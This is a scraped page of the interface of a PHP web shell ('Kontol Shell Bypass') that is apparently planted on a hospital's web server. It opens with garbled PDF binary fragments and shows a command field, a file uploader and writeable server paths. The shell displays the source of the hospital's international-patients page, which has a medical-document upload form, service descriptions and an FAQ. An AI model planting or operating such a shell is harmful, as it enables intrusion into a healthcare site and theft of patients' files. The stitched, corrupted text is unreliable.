%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital.org/application/views_new/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/application/views_new/internationalpatients.php
<section class="slider">
  <div class="  ">


    <div class="slder-inner">
      <img src="<?=base_url('assests/images/international-banner.png')?>">
      <div class="headeings">
        <div class="container">
          <div class="row">
            <div class="col-md-6">
              <div class="slderin">
                <h1> World class quality of service to make your medical journey hassle free. </h1>
                <h2>International Patients</h2>
              </div>

            </div>
          </div>
        </div>

      </div>
    </div>
  </div>
</section>

<section class="inetr-sec">
  <div class="container">
    <div class="row">
      <div class="col-md-6">
        <div class="inter-contant">

          <div class="heading-2line-left">
            <h4> Facilities for International Patients</h4>
          </div>
          <p>Our International Patients Team ensures providing you with world class quality of service to make your
            medical journey hassle free for you and your family.</p>
          <div class="new-listing">
            <ul>
              <li>Providing detailed medical opinion and tele- consultation with our team of doctors before arrival</li>

              <li>Assistance with Visa Services</li>

              <li>A dedicated relationship manager is assigned to each patient to take care of all you needs inside the
                hospital and to assist you with hospital administrative processes</li>

              <li>International Concierge Desk at dedicated International lounge will help to arrange for a hotel/ guest
                house as per your preference.</li>

              <li>Complimentary two way airport transfers</li>

              <li>Dedicated Relationship manager to take care of all you needs inside the hospital.</li>

              <li>Payments can be done either via cash, credit card or Wire Transfer.</li>

              <li>International Concierge Desk available at the hospital will facilitate travel within the city as well
                as for local sight-seeing</li>

              <li>Interpreters available at the hospital</li>
            </ul>
          </div>
        </div>

      </div>
      <div class="col-md-6">
        <div class="get-instimated">
          <h3>Get an Estimate</h3>
          <form action="<?=base_url('InternationalPatients')?>" class="" method="POST"
            enctype="multipart/form-data" name="document_form" id="document_form">
          <div class="row">
              <?php if(!empty($submit_status_msg)) { ?>
              <p>
                <?=$submit_status_msg?>
              </p>
              <?php } ?>
              <div class="col-md-12">
                <input type="text" class="form-control" maxlength="150" placeholder="Name of patient *" autocomplete=OFF value="" name="full_name" id="name" required>
                  <small id="namevalid" class="form-text text-muted invalid-feedback">
                        Your username must be more than 2 characters long and should start with a Capital letter.
                      </small>
              </div>
              <div class="col-md-6">
                <select name="age" id="age" required>
                  <option value="">Age*</option>
                  <?php for($k=1; $k<=100; $k++){ ?>
                  <option value="<?=$k?>">
                    <?=$k?>
                  </option>
                  <?php } ?>
                </select>
              </div>
              <div class="col-md-6">
                  <select name="gender" id="gender" required>
                    <option value="">Gender*</option>
                    <option value="Male">Male</option>
                    <option value="Female">Female</option>
                    <option value="Other">Other</option>
                  </select>
              </div>
              <div class="col-md-6">
                <input type="email" class="form-control" maxlength="100" value="" name="email_id" id="emailid" autocomplete=OFF required placeholder="Email Id *">
                <small id="emailvalid" class="form-text text-muted invalid-feedback">
                        Your email must be a valid email
                      </small>
              </div>
              <div class="col-md-6">
                <span class="select" id="country_div" >
                  <select name="country" id="country" class="country"  required>
                  <option value="">Country*</option>
                  </select>
                </span>
              </div>
              <div class="col-md-6">
                <input type="text" class="form-control" value="" placeholder="Contact No *" onkeyup="this.value=this.value.replace(/[^\d]/,'')"  autocomplete="off" name="contact_number" id="contact_number" maxlength="15" required>
              </div>
              <div class="col-md-6">
                <select name="medical" required />
                <option value="">Select Mecial Procedure*</option>
                <?php  foreach($medical as $value){ ?>
                  <option value="<?php echo $value['medical_procedure']?>" ><?php echo $value['medical_procedure']?></option>
                  <?php } ?></select>
              </div>
              <div class="col-md-6">
                <label>Upload your documents/scans etc </label>
                <span class="btn-file" id="documents_div">
                  <input type="file" name="documents" id="documents" required>
                  <!-- <a href="" class="btn button1">Choose File*</a> -->
                </span>
              </div>
              <div class="col-md-6">
                <label>Upload Last Medical Prescription </label>
                <span class="btn-file" id="medical_prescription_div">
                  <input type="file" name="last_medical_prescription" id="last_medical_prescription" required>
                  <!-- <a href="#" class="btn button1">Choose File*</a> -->
                </span>
              </div>

              <div class="col-md-12">
                <textarea class="form-control" placeholder="comments" id="comments" name="comments"
                  maxlength="500"></textarea>
              </div>
              <div class="col-md-12">
                <input type="submit" name="submit" value="GET AN ESTIMATE" class="btn button1 get_an_estimate"
                  onclick="return validate_form()" />

                <small>Disclaimer : This is an indicative cost based on the reports / information shared with us. Final
                  estimate will be shared once patient is physically evaluated. </small>
              </div>

          </div>
                </form>

        </div>

      </div>
    </div>
  </div>
</section>

<section class="inter2-sec">
  <div class="container">
    <div class="row">

      <div class="col-md-6">
        <div class="inter-2">
          <div class="images">
            <img src="<?=base_url('assests/images/patient1.png')?>">
          </div>
          <div class="contant">
            <strong>Pre-Treatment Services</strong>
            <p>We instill our faith in the phrase - Vasudhaiva Kutumbakam, which means, the world is one big family. And
              hence, at Sharda Hospital, we treat our international patients as our revered guests who deserve utmost
              comfort, care and regard. Our happy patients flying back with memorable stories keep us propelled for
              sustained hard work and improved hospitality.</p>
            <!-- <a href="#" class="button1">View Detail <span><i class="bi bi-arrow-right-short"></i></span></a> -->

          </div>
        </div>

      </div>
      <div class="col-md-6">
        <div class="inter-2">
          <div class="images">
            <img src="<?=base_url('assests/images/patient2.png')?>">
          </div>
          <div class="contant">
            <strong>Post Treatment Services</strong>
            <p>Your cordial relationship with Sharda will be everlasting. That means, even after you leave the campus,
              we ensure that your quick recovery happens as scheduled. Enjoy the benefits of Sharda’s best in class post
              treatment services provided by our valuable staff.</p>
            <!-- <a href="#" class="button1">View Detail <span><i class="bi bi-arrow-right-short"></i></span></a> -->

          </div>
        </div>

      </div>
    </div>
  </div>
</section>

<section class="value-sec">
  <div class="container">
    <div class="row">
      <div class="col-md-12">
        <h4>Value Added Services</h4>
      </div>
      <div class="col-md-12">



        <div class="accordion" id="accordionExample">
          <div class="accordion-item">
            <h2 class="accordion-header" id="panelsStayOpen-headingOne">
              <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse"
                data-bs-target="#panelsStayOpen-collapseOne" aria-expanded="true"
                aria-controls="panelsStayOpen-collapseOne">
                Tele-Medicine
              </button>
            </h2>
            <div id="panelsStayOpen-collapseOne" class="accordion-collapse collapse"
              aria-labelledby="panelsStayOpen-headingOne" data-bs-parent="#accordionExample">
              <div class="accordion-body">
                <strong> DOCTOR'S ADVICE. ANYTIME. ANYWHERE.</strong>
                <p>Sharda Hospital has a Telemedicine solution, a synergistic convergence of Information Technology with
                  medical science. Sharda Hospital's telemedicine centre uses live video conferencing and real time
                  medical record sharing/communication portal. Sharda Hospital's telemedicine centre uses live video
                  conferencing and real time medical record sharing/communication portal. The combination of
                  telemedicine technology paired with specialty medical devices enables Sharda doctors to the patient as
                  if they were actually in the examination room with the patient. The specialist can provide assessment,
                  diagnosis and treatment, request referral, send laboratory test request and provide prescription to
                  the patient.<br /><br />

                  The advent of new technologies has given rise to virtual medical advice from anywhere in the world.
                  With Telemedicine, patients can consult Sharda doctors from wherever they are, using their smartphones
                  or PC. The combination of telemedicine technology paired with specialty medical devices enables our
                  doctors to see the patient as if they were actually in the examination room with the patient. The
                  specialist can examine the patient, review vital signs and patient history, provide assessment,
                  diagnosis and treatment (which can usually be delivered locally), request referral, send laboratory
                  test request and provide prescription to the patient. Telemedicine minimizes the need for travel for
                  both the patient as well as the specialist.</p>

                <strong>KEY BENEFITS</strong>
                <div class="new-listing">
                  <ul>
                    <li>Enhance reach and touch more lives</li>
                    <li>Increase productivity and efficiencies</li>
                    <li>Higher capital efficiency</li>
                    <li>Connect early in the patient lifecycle</li>
                    <li>Attractive consult model</li>
                    <li>Enhanced user experience</li>
                    <li>Secure</li>
                  </ul>
                </div>

                <p>Telemetry Devices ( Optional - To be procured by customer)
                  <br /><br />
                  To provide patients with an in-person comparable experience, the patient end point is supported by
                  interoperable third party Telemetry enabled medical devices. The devices that the platform is
                  currently integrated with are FDA compliant, HL7 compliant and work as plug-andplay. Currently the
                  platform support a range of 8 telemetry devices.
                  <br /><br />
                  Below is a list of some of the Telemetry enabled medical devices at patient endpoint:
                </p>
                <div class="new-listing">
                  <ul>
                    <li>Vital signs monitor (temperature, heart rate, blood pressure, oxygen saturation)</li>
                    <li>Stethoscope</li>
                    <li>ECG</li>
                    <li>General exam camera</li>
                    <li>Otoscope</li>
                    <li>Ophthalmoscope</li>
                    <li>Dermascope</li>
                  </ul>
                </div>
                <p>Sharda Hospital aims at connecting our team of 300+ doctors to the patient at any remote location of
                  the world.</p>

              </div>
            </div>
          </div>
          <div class="accordion-item">
            <h2 class="accordion-header" id="panelsStayOpen-headingTwo">
              <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse"
                data-bs-target="#panelsStayOpen-collapseTwo" aria-expanded="false"
                aria-controls="panelsStayOpen-collapseTwo">
                Teleradiology
              </button>
            </h2>
            <div id="panelsStayOpen-collapseTwo" class="accordion-collapse collapse"
              aria-labelledby="panelsStayOpen-headingTwo" data-bs-parent="#accordionExample">
              <div class="accordion-body">
                <strong>Transmitting radiology reports beyond boundaries</strong>
                <p>Sharda Hospital extensively uses Teleradiology for transmission of radiological patient images, such
                  as MRI’s, CT Scans & X-rays from one location to another for the purposes of sharing studies with
                  other radiologists and doctors.
                  <br /><br />
                  This technology intervention helps patients and diagnostic centres in remote locations to connect with
                  Sharda's radiologists with their radiology images for expert opinion and get appropriate treatment
                  recommendations. This service will play a very vital role in reducing patient waiting time for
                  diagnosis, treatment commencement and cost.
                </p>
              </div>
            </div>
          </div>
          <div class="accordion-item">
            <h2 class="accordion-header" id="panelsStayOpen-headingThree">
              <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse"
                data-bs-target="#panelsStayOpen-collapseThree" aria-expanded="false"
                aria-controls="panelsStayOpen-collapseThree">
                Telepathology
              </button>
            </h2>
            <div id="panelsStayOpen-collapseThree" class="accordion-collapse collapse"
              aria-labelledby="panelsStayOpen-headingThree" data-bs-parent="#accordionExample">
              <div class="accordion-body">
                <p>Tele-Pathology helps to exchange specimen slides with scanned and high-resolution digital images via
                  microscopic digital cameras. TelePathology makes it faster and easier to share medical images.
                  Biopsies can be cut, stained, scanned, magni?ed and sent digitally during an operation. A pathologist
                  can read the slides remotely in real-time and provide the surgeon with an immediate diagnosis.

                </p>
              </div>
            </div>
          </div>
          <div class="accordion-item">
            <h2 class="accordion-header" id="panelsStayOpen-headingfour">
              <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse"
                data-bs-target="#panelsStayOpen-collapsefour" aria-expanded="false"
                aria-controls="panelsStayOpen-collapsefour">
                Tele ICU
              </button>
            </h2>
            <div id="panelsStayOpen-collapsefour" class="accordion-collapse collapse"
              aria-labelledby="panelsStayOpen-headingfour" data-bs-parent="#accordionExample">
              <div class="accordion-body">
                <p>Tele-ICU is a new addition in the ?eld of healthcare to take Sharda's Hospital's critical care unit
                  to a higher level and standard. It is a type of virtual ICU (intensive care unit) that remotely
                  observes a patient’s status via state-of-the-art audio-visual communication and computer systems with
                  the help of a reliable networking with a bedside ICU team. Doctors give expert advice for management
                  of critically ill patients including initiation of mechanical ventilation or noninvasive ventilation,
                  hemodynamic monitoring support, management of di?cult to ventilate patients like ARDS and obstructive
                  lung disease.</p>
              </div>
            </div>
          </div>
        </div>

      </div>
    </div>
  </div>
</section>


<section class="our-jaurneysec">
  <div class="container">
    <div class="row">
      <div class="col-md-12">
        <div class="jaurneysec-top">
          <div class="heading-2line">
            <h4>Your Journey at Sharda Hospital</h4>
          </div>
          <p>Our International Patients Team ensures providing you with world class quality of service to make
            your<br /> medical journey hassle
            free for you and your family.</p>

        </div>
      </div>
      <div class="col-md-2"></div>
      <div class="col-md-8">

        <div class="d-flex align-items-start">
          <div class="nav flex-column nav-pills me-3 pills-buttons" id="v-pills-tab" role="tablist"
            aria-orientation="vertical">
            <button class="nav-link active" id="v-pills-2005-tab" data-bs-toggle="pill" data-bs-target="#v-pills-2005"
              type="button" role="tab" aria-controls="v-pills-2005" aria-selected="true">Step 1</button>
            <button class="nav-link" id="v-pills-2009-tab" data-bs-toggle="pill" data-bs-target="#v-pills-2009"
              type="button" role="tab" aria-controls="v-pills-2009" aria-selected="false">Step 2</button>
            <button class="nav-link" id="v-pills-2015-tab" data-bs-toggle="pill" data-bs-target="#v-pills-2015"
              type="button" role="tab" aria-controls="v-pills-2015" aria-selected="false">Step 3</button>
            <button class="nav-link" id="v-pills-2018-tab" data-bs-toggle="pill" data-bs-target="#v-pills-2018"
              type="button" role="tab" aria-controls="v-pills-2018" aria-selected="false">Step 4</button>
            <button class="nav-link" id="v-pills-2021-tab" data-bs-toggle="pill" data-bs-target="#v-pills-2021"
              type="button" role="tab" aria-controls="v-pills-2021" aria-selected="false">Step 5</button>
            <button class="nav-link" id="v-pills-2022-tab" data-bs-toggle="pill" data-bs-target="#v-pills-2022"
              type="button" role="tab" aria-controls="v-pills-2022" aria-selected="false">Step 6</button>
          </div>
          <div class="tab-content" id="v-pills-tabContent">
            <div class="tab-pane fade show active" id="v-pills-2005" role="tabpanel" aria-labelledby="v-pills-2005-tab">
              <div class="pills-conant">
                <p><strong>Get your medical history reviewed -</strong> In case you’re suffering from a concurrent
                  anomaly, we advise you to mail us your medical history at * or give a call at *. We shall connect you
                  to the appropriate professional.</p>

                <div class="comma">
                  <img src="<?=base_url('assests/images/')?>about-comma.png" />
                </div>
              </div>

            </div>
            <div class="tab-pane fade" id="v-pills-2009" role="tabpanel" aria-labelledby="v-pills-2009-tab">
              <div class="pills-conant">
                <p><strong>Have a Glimpse of Our Facilities Through Video Call -</strong> Before visiting the hospital,
                  feel free to ask for a video call to get a better view of the facilities, services, and doctors
                </p>

                <div class="comma">
                  <img src="<?=base_url('assests/images/')?>about-comma.png" />
                </div>
              </div>
            </div>
            <div class="tab-pane fade" id="v-pills-2015" role="tabpanel" aria-labelledby="v-pills-2015-tab">
              <div class="pills-conant">
                <p><strong>Stay Rest Assured Of Your Visit to Sharda -</strong> Our special team takes care of your
                  booking requirements for flight, hotel, and cab. We hold our faith in the notion - Atithi Devo Bhava -
                  Treat Guests Like Gods</p>

                <div class="comma">
                  <img src="<?=base_url('assests/images/')?>about-comma.png" />
                </div>
              </div>
            </div>
            <div class="tab-pane fade" id="v-pills-2018" role="tabpanel" aria-labelledby="v-pills-2018-tab">
              <div class="pills-conant">
                <p><strong>Your Companion at Sharda -</strong> Every member of the hospital will be your companion
                  during the stay here. Apart from that, we have our friendly team of Hospital Companions to walk you
                  through all the processes. Your Companion will guide you from admission to discharge. Don’t forget to
                  click loads of pictures with them after you check out.
                </p>

                <div class="comma">
                  <img src="<?=base_url('assests/images/')?>about-comma.png" />
                </div>
              </div>
            </div>
            <div class="tab-pane fade" id="v-pills-2021" role="tabpanel" aria-labelledby="v-pills-2021-tab">
              <div class="pills-conant">
                <p><strong>Your Documents are Safe With Us -</strong> Documenting all your medical records,
                  prescriptions, and doctor recommendations is an onus we shall take. Also, we take care of your Visa
                  documents, flight arrangements, and hotel booking papers.
                </p>

                <div class="comma">
                  <img src="<?=base_url('assests/images/')?>about-comma.png" />
                </div>
              </div>
            </div>
            <div class="tab-pane fade" id="v-pills-2022" role="tabpanel" aria-labelledby="v-pills-2022-tab">
              <div class="pills-conant">
                <p><strong>Fly Back Safe and Share Your Story -</strong> Our happy patients are our strength. You can
                  easily reach your doctor, even after you are discharged. Our tech-savvy doctors would love to see you
                  in the cosy ambience of your home.</p>

                <div class="comma">
                  <img src="<?=base_url('assests/images/')?>about-comma.png" />
                </div>
              </div>
            </div>
          </div>
        </div>

      </div>




    </div>
  </div>
</section>
<section class="patient-stories">
  <div class="container">
    <div class="row">
      <div class="col-md-12">
        <h4>Patient Stories & Testimonials</h4>
      </div>

      <div class="col-md-6">
        <div class="heading-mix">
          <h5>Read Stories of Successful Treatment</h5>
          <a href="<?=base_url('patient-experience')?>">Read All Stories <i class="fa fa-angle-double-right"
              aria-hidden="true"></i></a>
          <div class="clearfix"></div>
        </div>
        <div class="home-story">
          <ul>
            <?php 
                        foreach($patient_stories as $value){
                            //print_r($value);
                        ?>
            <li>
              <div class="image"><img src="<?=base_url('assests/images')?>/diagnostics.png"></div>
              <div class="con">
                <div class="comma"><img src="<?=base_url('assests/images')?>/comma.png"></div>
                <p>
                  <?= $value['PatientStoryTitle'];?>
                </p>
                <a href="<?=base_url(('patient-experience/').$value['PatientStoryPageURL'])?>">Read Full Stories <i
                    class="fa fa-angle-right" aria-hidden="true"></i></a>
              </div>
              <div class="clearfix"></div>
            </li>
            <?php } ?>

          </ul>
        </div>
      </div>
      <div class="col-md-6">
        <div class="patient-video">

          <ul class="patient-video-slider dotslider">
            <?php 
                        foreach($testimonal as $value){
                           //print_r($value);
                        ?>
            <li>
              <div class="image"><iframe src="<?= $value['Testimonial_videourl'];?>"></iframe></div>
              <div class="con">
                <p>
                  <?= $value['TestimonialPatientName'];?> from
                  <?= $value['TestimonialNationality'];?> shares our experience at Sharda Hospital
                </p>
              </div>
              <div class="clearfix"></div>
            </li>

            <?php } ?>
          </ul>
        </div>
      </div>


    </div>
  </div>
</section>
<section class="value-sec">
  <div class="container">
    <div class="row">
      <div class="col-md-12">
        <h4>Frequently Asked Questions </h4>
      </div>
      <div class="col-md-1">
      </div>
      <div class="col-md-10">
        <div class="accordion" id="accordionPanelsStayOpenExample">
          <div class="accordion-item">
            <h2 class="accordion-header" id="panelsStayOpen-heading-1">
              <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse"
                data-bs-target="#panelsStayOpen-collapse-1" aria-expanded="true"
                aria-controls="panelsStayOpen-collapse-1">
                What do I do on reaching the airport
              </button>
            </h2>
            <div id="panelsStayOpen-collapse-1" class="accordion-collapse collapse "
              aria-labelledby="panelsStayOpen-heading-1">
              <div class="accordion-body">
                <p>Ans - You shall be welcomed by our Executive at the airport who will be your assistant throughout
                  your stay. They will help you in boarding the cab arranged by the hospital and will arrange your stay
                  at the hotel that fits your budget.</p>
              </div>
            </div>
          </div>
          <div class="accordion-item">
            <h2 class="accordion-header" id="panelsStayOpen-heading-2">
              <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse"
                data-bs-target="#panelsStayOpen-collapse-2" aria-expanded="true"
                aria-controls="panelsStayOpen-collapse-2">
                What if the patient needs immediate care?
              </button>
            </h2>
            <div id="panelsStayOpen-collapse-2" class="accordion-collapse collapse  "
              aria-labelledby="panelsStayOpen-heading-2">
              <div class="accordion-body">
                <p>Ans - In case the patient needs immediate care, we send a team of doctors for intensive care services
                  in our well-equipped ambulance.</p>
              </div>
            </div>
          </div>
          <div class="accordion-item">
            <h2 class="accordion-header" id="panelsStayOpen-heading-3">
              <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse"
                data-bs-target="#panelsStayOpen-collapse-3" aria-expanded="true"
                aria-controls="panelsStayOpen-collapse-3">
                Where do I go when I reach the hospital?
              </button>
            </h2>
            <div id="panelsStayOpen-collapse-3" class="accordion-collapse collapse  "
              aria-labelledby="panelsStayOpen-heading-3">
              <div class="accordion-body">
                <p>Ans - You will meet your Hospital Companion on your first day who will walk you through the
                  procedures. They will fix your appointment, take you to the doctors, give you a tour of the hospital
                  and resolve all your queries.</p>
              </div>
            </div>
          </div>
          <div class="accordion-item">
            <h2 class="accordion-header" id="panelsStayOpen-heading-4">
              <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse"
                data-bs-target="#panelsStayOpen-collapse-4" aria-expanded="true"
                aria-controls="panelsStayOpen-collapse-4">
                How do I and my family members communicate with the hospital staff, given that they speak a different
                language?
              </button>
            </h2>
            <div id="panelsStayOpen-collapse-4" class="accordion-collapse collapse  "
              aria-labelledby="panelsStayOpen-heading-4">
              <div class="accordion-body">
                <p>Ans - Most of our doctors are multilingual which means language will not be a barrier. Also, we shall
                  arrange coordinators and interpreters who act as a medium of conversation between you and your doctor.
                  We shall also assist your family and friends for the same.

                </p>
              </div>
            </div>
          </div>
          <div class="accordion-item">
            <h2 class="accordion-header" id="panelsStayOpen-heading-5">
              <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse"
                data-bs-target="#panelsStayOpen-collapse-5" aria-expanded="true"
                aria-controls="panelsStayOpen-collapse-5">
                Is there a dedicated lounge for International Patients?
              </button>
            </h2>
            <div id="panelsStayOpen-collapse-5" class="accordion-collapse collapse  "
              aria-labelledby="panelsStayOpen-heading-5">
              <div class="accordion-body">
                <p>Ans - Yes, at the dedicated lounge for International patients, you will be attended well by the
                  assistants, helpers, and the medical staff.</p>
              </div>
            </div>
          </div>
          <div class="accordion-item">
            <h2 class="accordion-header" id="panelsStayOpen-heading-6">
              <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse"
                data-bs-target="#panelsStayOpen-collapse-6" aria-expanded="true"
                aria-controls="panelsStayOpen-collapse-6">
                What is Day Care Surgery?
              </button>
            </h2>
            <div id="panelsStayOpen-collapse-6" class="accordion-collapse collapse  "
              aria-labelledby="panelsStayOpen-heading-6">
              <div class="accordion-body">
                <p>Ans - Day care surgery means patients undergoing surgery / procedures do NOT require to stay
                  overnight in the Hospital.</p>
              </div>
            </div>
          </div>
          <div class="accordion-item">
            <h2 class="accordion-header" id="panelsStayOpen-heading-7">
              <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse"
                data-bs-target="#panelsStayOpen-collapse-7" aria-expanded="true"
                aria-controls="panelsStayOpen-collapse-7">
                What is the Mode of Payment?
              </button>
            </h2>
            <div id="panelsStayOpen-collapse-7" class="accordion-collapse collapse  "
              aria-labelledby="panelsStayOpen-heading-7">
              <div class="accordion-body">
                <p>Ans - Patients can deposit the payment by cash/Demand draft / Credit cards like MASTERCARD / VISA
                  cards .</p>
              </div>
            </div>
          </div>
          <div class="accordion-item">
            <h2 class="accordion-header" id="panelsStayOpen-heading-8">
              <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse"
                data-bs-target="#panelsStayOpen-collapse-8" aria-expanded="true"
                aria-controls="panelsStayOpen-collapse-8">
                Where will my out of station attendant / Visitors stay at night ?
              </button>
            </h2>
            <div id="panelsStayOpen-collapse-8" class="accordion-collapse collapse  "
              aria-labelledby="panelsStayOpen-heading-8">
              <div class="accordion-body">
                <p>Ans - Adequate rest is important for you. However, we have accommodation in Rain Basera and
                  University Guest House</p>
              </div>
            </div>
          </div>
          <div class="accordion-item">
            <h2 class="accordion-header" id="panelsStayOpen-heading-9">
              <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse"
                data-bs-target="#panelsStayOpen-collapse-9" aria-expanded="true"
                aria-controls="panelsStayOpen-collapse-9">
                How long I will be at the Hospital?
              </button>
            </h2>
            <div id="panelsStayOpen-collapse-9" class="accordion-collapse collapse  "
              aria-labelledby="panelsStayOpen-heading-9">
              <div class="accordion-body">
                <p>Ans - The length of your stay is based on your progress and your treatment. Please check with your
                  doctor.</p>
              </div>
            </div>
          </div>
          <div class="accordion-item">
            <h2 class="accordion-header" id="panelsStayOpen-heading-10">
              <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse"
                data-bs-target="#panelsStayOpen-collapse-10" aria-expanded="true"
                aria-controls="panelsStayOpen-collapse-10">
                Why Can't I use my own medications when i am in the Hospital?
              </button>
            </h2>
            <div id="panelsStayOpen-collapse-10" class="accordion-collapse collapse  "
              aria-labelledby="panelsStayOpen-heading-10">
              <div class="accordion-body">
                <p>Ans - Our Pharmacy is committed to making sure patients use prescribed drugs safely. When you bring
                  medicines from home, we don't know if the drug has been properly stored or original or is otherwise
                  safe. To make sure our patients receive medication in the exact dosage needed, they are given only
                  those medications ordered by their doctor from the hospital Pharmacy.</p>
              </div>
            </div>
          </div>
          <div class="accordion-item">
            <h2 class="accordion-header" id="panelsStayOpen-heading-11">
              <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse"
                data-bs-target="#panelsStayOpen-collapse-11" aria-expanded="true"
                aria-controls="panelsStayOpen-collapse-11">
                What is the time of discharge?
              </button>
            </h2>
            <div id="panelsStayOpen-collapse-11" class="accordion-collapse collapse  "
              aria-labelledby="panelsStayOpen-heading-11">
              <div class="accordion-body">
                <p>Ans - On the day of your discharge, our goal is to have you ready to leave before 12 noon. Your
                  doctor will write your discharge order after the morning visit and we assure a quick completion of
                  formalities.</p>
              </div>
            </div>
          </div>
          <div class="accordion-item">
            <h2 class="accordion-header" id="panelsStayOpen-heading-12">
              <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse"
                data-bs-target="#panelsStayOpen-collapse-12" aria-expanded="true"
                aria-controls="panelsStayOpen-collapse-12">
                Is Dining facility available at Sharda?
              </button>
            </h2>
            <div id="panelsStayOpen-collapse-12" class="accordion-collapse collapse "
              aria-labelledby="panelsStayOpen-heading-12">
              <div class="accordion-body">
                <p>Ans - Yes, we do have canteen facility at University and Hospital as well. Lego House in University
                  premises ; Urban Thali , Uncle Cafe , More than Cafe and Sharda Food within the Hospital Premises.</p>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>
<script>
 let noteCards = document.getElementById('country');
//  console.log(noteCards.innerHTML); 
  fetch('https://countriesnow.space/api/v0.1/countries')
    .then(response => response.json())
    .then(data => {
      for(let i=0; i<=data.data.length; i++){
        let str="";
        // str +=`<option value='${data.data[i].country}'>${data.data[i].country}</option>`;
        noteCards.innerHTML += `<option value='${data.data[i].country}'>${data.data[i].country}</option>`;
      }
    })
    .catch(error => console.error(error))
</script>
<script>
    const name = document.getElementById('name');
    const email = document.getElementById('emailid');
    const namevalid =document.getElementById("namevalid").style.display = "none"; 
    const emailvalid =document.getElementById("emailvalid").style.display = "none"; 
    // console.log(name);
    // console.log(email);
    name.addEventListener('blur', ()=>{
    // console.log("name is blurred");
    // Validate name here
    let regex = /^[A-Z]([0-9a-zA-Z]){2,10}$/;
    let str = name.value;
    // console.log(regex, str);
    if(regex.test(str)){
        // console.log('Your name is valid');
        name.classList.remove('is-invalid');
        const namevalid =document.getElementById("namevalid").style.display = "none"; 
    }
    else{
        // console.log('Your name is not valid');
        name.classList.add('is-invalid');
        const namevalid =document.getElementById("namevalid").style.display = "block"; 
        
    }
    });
    email.addEventListener('blur', ()=>{
    console.log("email is blurred");
    // Validate email here
    let regex = /^([_\-\.0-9a-zA-Z]+)@([_\-\.0-9a-zA-Z]+)\.([a-zA-Z]){2,7}$/;
    let str = email.value;
    // console.log(regex, str);
    if(regex.test(str)){
        // console.log('Your email is valid');
        email.classList.remove('is-invalid');
        const emailvalid =document.getElementById("emailvalid").style.display = "none";
    }
    else{
        // console.log('Your email is not valid');
        email.classList.add('is-invalid');
        const emailvalid =document.getElementById("emailvalid").style.display = "block"; 
    }
});

</script>

Kontol Shell Bypass